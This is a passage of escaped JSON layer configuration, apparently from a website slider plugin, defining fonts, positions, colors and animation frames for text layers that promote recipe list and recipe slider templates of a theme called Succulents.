\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\"},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"6\":{\"text\":\"Recipe List\",\"alias\":\"Reacents Post\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"246px\",\"e\":true},\"n\":{\"v\":\"-441px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"246px\"}},\"y\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"427px\",\"e\":true},\"m\":{\"v\":\"427px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"7\":{\"text\":\"Recipe Slider\",\"alias\":\"Reacents Post\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"247px\",\"e\":true},\"n\":{\"v\":\"-429px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"711px\",\"e\":true},\"n\":{\"v\":\"247px\",\"e\":true},\"t\":{\"v\":\"571px\",\"e\":true},\"m\":{\"v\":\"571px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"8\":{\"text\":\"Display your recipes for everyone to enjoy, all while including the images, a detailed description, a list of main & additional ingredients and more. \",\"alias\":\"It is a long establi...\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"245px\",\"e\":true},\"n\":{\"v\":\"-327px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"452px\",\"e\":true},\"n\":{\"v\":\"-2px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"9\":{\"text\":\"A template which gives a neat overview of all recipes featured on your website, and lets your visitors access each recipe with a single click. \\n\",\"alias\":\"It is a long establi...\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"247px\",\"e\":true},\"n\":{\"v\":\"-327px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"600px\",\"e\":true},\"n\":{\"v\":\"155px\",\"e\":true},\"t\":{\"v\":\"465px\",\"e\":true},\"m\":{\"v\":\"465px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"10\":{\"text\":\"With Succulents you can grab the all-important attention of your website visitors by showcasing the recipes in an eye-catching slider. \",\"alias\":\"It is a long 